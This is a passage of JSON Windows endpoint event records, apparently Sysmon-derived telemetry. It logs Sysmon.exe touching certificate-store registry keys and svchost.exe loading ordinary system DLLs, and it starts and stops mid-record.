"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "FirewallAPI.dll", - "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "esent.dll", - "image_path": "C:\\Windows\\System32\\esent.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "fwbase.dll", - "image_path": "C:\\Windows\\System32\\fwbase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 